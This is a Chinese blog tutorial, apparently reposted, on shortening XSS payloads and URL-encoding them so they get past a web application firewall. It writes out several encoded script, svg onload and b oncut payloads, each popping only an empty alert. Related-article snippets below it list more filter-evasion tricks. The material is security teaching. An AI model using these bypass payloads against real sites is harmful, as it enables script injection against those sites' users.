html%3cb%3e标签,用最短的payload绕过WAF(入门)

最新推荐文章于 2021-06-23 12:33:40 发布
最新推荐文章于 2021-06-23 12:33:40 发布
阅读量1.3k 收藏
点赞数
文章标签: html%3cb%3e标签

想绕过一个WAF,我们可以用最短的payload来做,这里只是基础示例,望各位大佬勿喷,小弟在此谢过。

我在这里先使用一个网页举例。

a77f64483979025997267933650b3577.png

然后输入经典的payload

fa78a89169205f809d5f65e6d51483fe.png

拒绝访问!看起来像是WAF正在限制我们的方式。所以我要用URL编码对我们的payload进行编码。可以在搜索引擎上找到一些可以做到这一点的网站,但我喜欢用火狐的HackBar插件。所以我把我的payload进行了编码。

46d94185b343334d9ba4a4285d76e5cf.png

9ae9a7a14af592c834305d4097e9212b.png

现在来看看是否可以绕过WAF

60278c350297a9f3abe8af8fba2d3877.png

是啊 我们成功了!

这真的很简单,但如果搜索表单不允许我们输入超过35个字符怎么办?或者25呢?

先尝试缩短这个75个字符长的payload。

首先,我们并不需要对所有内容进行编码,所以尝试通过不同的payload来找出WAF进行限制的字符。(这是一种方法,先测试waf限制的字符有哪些,哒哒哈)

%3cscript%3ealert(1)%3c%2fscript%3e Success

%3cscript>alert(1)%3c%2fscriptAccess Denied

%3cscript%3ealert(1)%3c/scriptSuccess

实际上也可以使用alert()而不是alert(1)。alert()将给我们一个空白的警告弹出,并将减小使用1个字符。

所以这里是我们的最后的payload只有31个字符:

%3cscript%3ealert()%3c/script>

JavaScript不限于脚本标签。所以可以尝试用不同的标签和事件处理程序创建payload。

拒绝访问

编码之后成功

%3c%73%76%67%20%6f%6e%6c%6f%61%64%3d%61%6c%65%72%74%28%29%3e 成功

尝试了payload的不同变体,找出应该编码的内容,这就是最后所得到的:

%3csvg onload%3dalert()> 成功

因此,现在将payload缩短为24个字符!能做得更短吗?可以,看看这个精美的payload%3cb oncut%3dalert()>

没有编码它看起来像这样

如果你输入了这个payload,没有任何事情会发生。

15096173358695.png!small

但是一旦尝试从网页上剪切一些文字

15096173402379.png!small

将会看到XSS的弹弹弹!哈哈

1509617346964.png!small

原文:http://www.cnblogs.com/ichunqiu/p/7773686.html

weixin_39695490
关注
burpsuite 修改HTML,BurpSuite调用JavaScript处理Payload,通过JS完全自定义处理逻辑
weixin_34137975的博客
06-04 1002
0×01 引言大家在使用burp的intruder模块时,一定遇到过已有payload processing不能满足需求的情况。例如某些系统使用了复杂的加密算法对参数加密之后传给服务器,当我们要对payload做复杂处理时,burp自带功能不能满足要求,只能自己写脚本翻译算法,这样一来,一定程度上进行了很多重复性工作,比如:从上图可以看出,password与nonce两个参数是js加密后传输的,如...
%3cscript%3e中写html,跨站脚本攻击(XSS)的原理、防范和处理方法脚本安全 -电脑资料...
weixin_31411315的博客
06-04 1533
0,1。概念以下概念摘抄自百度百科:XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。2。生效方式1)构造URLXSS攻击者通过构造URL的方式构造了一个有问题的页面;当其他人点击了此页面后,会发现页面出错,或者被暗中执行了某些...
用最payload绕过WAF入门
dfdhxb995397的博客
11-02 704
本文作者:jishuzhain <font color=green>想绕过一个WAF,我们可以用最payload来做,这里只是基础示例,望各位大佬勿喷,小弟在此谢过。</font> 我在这里先使用一个网页举例。 <script>alert(1)</script> 然后输入经典的payload 拒绝访...
WAF如何应对payload编码绕过
focus on security
06-07 1646
web服务器在对外提供各种应用服务时,经常会遇到请求的payload经过混淆或者编码想要绕过web安全防火墙。 如果在http请求中添加编码很可能会绕过waf规则,甚至绕过语义分析。导致数据泄漏风险,本应该被拦截的请求,还是得到了请求对应的响应数据。 可以通过下面连接了解一下,想要绕过web安全防火墙经过处理的payload长什么样。这里是我参考owasp(感谢他们对web安全做出的贡献)整理的xss攻击方式,包含各种经过处理的payload绕过方法。 https://blog.csdn.net/re
html %3c% page,page.html
weixin_39827850的博客
06-19 310
KIT ADMINKIT ADMINK控制台商品管理 捐赠我其它系统邮件管理消息管理授权管理 Van基本资料安全设置 注销 基本元素 表格 表单 导航栏 列表四 百度一下 组件 Navbar Tab OneLevel app.js主入口 请稍等...2017 ©kit.zhengjinfan.cn/ MIT licensevar c...
http请求中必备的字符段_HTTP请求中 request payload 和 formData 区别?
weixin_39627390的博客
11-25 133
FormData和Payload是浏览器传输给接口的两种格式,这两种方式浏览器是通过Content-Type来进行区分的(了解Content-Type),如果是 application/x-www-form-urlencoded的话,则为formdata方式,如果是application/json或multipart/form-data的话,则为 request payload的方式。比如如下使用...
html中%3c%3e括号,encodeURLComponent编码问题
weixin_42389030的博客
06-16 1159
问题所处环境:IIS 7.5, ASP.NET 4.0, 应用程序池(Application Pool)运行于集成模式(Integrated)。我们查了一下,具体的错误信息是:A potentially dangerous Request.QueryString value was detected from the client (t="...9)-解析Table.Attach引发的异常和解决方...
html页面能用%3cc %3e,整理HTML5中支持的URL编码与字符编码
weixin_29239661的博客
06-04 5955
URL 编码URL 编码就是将 URLs 中不宜打印的字符或者具有特殊意义的字符转换为 Web 浏览器和服务器明白且普遍接受的表示法。 这些字符包括:ASCII 控制字符 - 不宜打印的字符通常用于输出控制。字符范围是十六进制的 00-1F(十进制的 0-31)和 7F(十进制的 127)。下面提供了完整的编码表。非 ASCII 控制字符 - 这些字符超出了 128 个 ASCII 字符集的范围。...
java%3c%3e如何转义_如何让前端更安全?——XSS 攻击和防御详解
weixin_42362491的博客
02-28 1229
最近深入了解了一下XSS攻击。以前总肤浅的认为XSS防御仅仅只是输入过滤可能造成的XSS而已。然而这池子水深的很呐。1,XSS的类型总体来说,XSS分三类,存储型XSS、反射型XSS、DOM-XSS。1.1、存储型XSS数据库中存有的存在XSS攻击的数据,返回给客户端。若数据未经过任何转义。被浏览器渲染。就可能导致XSS攻击;1.2、反射型XSS将用户输入的存在XSS攻击的数据,发送给后台,后台并...
waf绕过方法总结
gugonggugong的博客
12-30 2925
一、WAF防护原理 1. bypass 客户端JavaScript校验;服务器校验;文件内容头字段、编码校验;后缀名黑名单校验;自定义正则校验;waf设备校验; 有些waf不会防asp/php/jsp后缀文件,但是他会检测里面的文件; WTS-WAF bypass ; baidu colud bypass; aliyun waf; 安全狗上传bypass;云锁上传bypass; 2. defense ...
html 显示 %3c,HTML没有显示已解码的%3C?(HTML does not show decoded %3C?)
weixin_33130113的博客
06-18 386
HTML没有显示已解码的%3C?(HTML does not show decoded %3C?)以下代码块类似但具有不同的输入字符串,因此结果不同:// This does not change HTMLvar str = "%3Cdiv%3E"; // var str_dec = decodeURIComponent(str);console.log(str_dec); // Console ...
php %3cphp用大括号表示,整理HTML5中支持的URL编码与字符编码_html5教程技巧
weixin_34583171的博客
03-09 745
URL 编码URL 编码就是将 URLs 中不宜打印的字符或者具有特殊意义的字符转换为 Web 浏览器和服务器明白且普遍接受的表示法。 这些字符包括:ASCII 控制字符 - 不宜打印的字符通常用于输出控制。字符范围是十六进制的 00-1F(十进制的 0-31)和 7F(十进制的 127)。下面提供了完整的编码表。非 ASCII 控制字符 - 这些字符超出了 128 个 ASCII 字符集的范围。...
html表达式 %3c,避开XSS过滤常用方法
weixin_32528123的博客
06-23 552
0x01 许多过滤匹配特殊的标签,包括起始与结束尖括号。但是,许多浏览器接受结束括号前的空白符,允许攻击者轻易避开这种过滤。例如:0x02 因为许多人用小写字符编写HTML代码,所以一些过滤仅检查常用的小写恶意标签。例如:,通过改变字符大小写避开过滤。0x03 一些过滤匹配任何成对的起始与结束尖括号,删除其中的任何内容,但通常可以依靠周围现有的语法,结束注入的标签,从而避开这种过滤。例如:可以控制...
html网页中显示字符%3c,浏览器是否有其他序列解释为HTML特殊字符?
weixin_30301989的博客
06-17 581
HTML中,有几个特殊字符< > & ' "对DOM解析器有重要意义。这些是诸如PHP htmlspecialchars等流行函数转换为HTML实体的字符,以便在解析时不会意外触发某些内容。浏览器是否有其他序列解释为HTML特殊字符?执行的翻译是:'&'(符号)变成&"(双引号)变得" 当没有设置ENT_NOQUOTES。'(单引号)变成'只有当设置ENT_Q...
%3c html%3e什么意思,我想问下这段代码是什么意思
weixin_39540725的博客
06-18 1213
replace方法有第二个参数可以是一个用来替代匹配结果的字符串或者一个function(你这里面就是一个function),当时一个function的时候,MDN上解释此function此时是一个用来创建新子字符串的函数,该函数的返回值将替换掉第一个参数匹配到的结果。你这段代码即先将字符串话的a encode一下,然后将encode之后的字符串中的%(23|24|26|2B|3A|3C|3E|3...
html %3c自动转化<,一行代码让谷歌浏览器变成在线编辑器(示例代码)
weixin_35876299的博客
05-31 1509
这个比较好玩,或许有时能用上。只需在浏览器地址栏里输入一行代码:data:text/html, 为什么它能奏效?这是用了数据URI的格式(Data URI’s format),并告诉浏览器渲染 HTML。不过 contenteditable是 HTML5 的一个属性,所以这个小技巧只能用于支持该属性的现代浏览器。(IE 8–就不行了 )有趣的内容还在下面不少程序员受 Jose 的启发,开始对这行代...
html%3c转译,[转]URL编码
weixin_39675215的博客
06-20 319
URL编码作者: Chandrasekhar Vuppalapati翻译:eastvc下载源代码本文的目的是设计一个完成URL编码的C++类。在我曾经的项目中,我需要从VC++ 6.0应用程序中POST数据,而这些数据需要进行URL编码。我在MSDN中查找能根据提供的字符串生成URL编码的相关类或API,但我没有找到,因此我必须设计一个自己的URLEncode C++类。URLEncoder.ex...
html 显示有%3c符号的数据,在不使用span的情况下更改HTML列表的项目符号颜色
weixin_39642687的博客
06-05 129
我们可以将list-style-image与svg组合在一起,我们可以在css中内联!这种方法对“子弹”提供了令人难以置信的控制,“子弹”可以成为任何东西。要获得一个红色圆圈,只需使用以下css:ul {list-style-image: url('data:image/svg+xml,');}但这只是一个开始。这允许我们用这些子弹做任何我们想要的疯狂事情。圆形或矩形很容易,但你可以用svg绘制的...
html option怎么显示%3c符号,跟bWAPP学WEB安全(PHP代码)--XSS跨站脚本攻击
weixin_32819265的博客
06-20 147
背景这个系列有很多题,但是其实考察的相近,类似的就不在多说,我们来看吧。主要分几个点来讲:反射型存储型JSONXM头部字段相关分类介绍反射型存储型一般在博客留言板、评论、个人信息维护等地方容易存在,就是用户构造XSS的Payload保存在数据库中,一旦用户访问该页面,则中招。JSON型没有什么太大的不同,注意构造一下Payload,闭合标签即可,Payload:"alert(1)XML型在XML解...
x=%3Cscript%3E
最新发布
05-30
这个请求中,x的值是"%3Cscript%3E",它是对字符串"<script>"进行URL编码后的结果。在URL中,某些字符需要进行编码,才能在网络上正确传输和展示。"<"和">"等字符在URL中有特殊含义,如果直接使用这些字符,可能会导致URL解析错误。因此,需要对这些字符进行编码,才能在URL中使用。"%3C"是"<"的URL编码,"%3E"是">"的URL编码。因此,"%3Cscript%3E"表示的就是字符串"<script>"的URL编码结果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值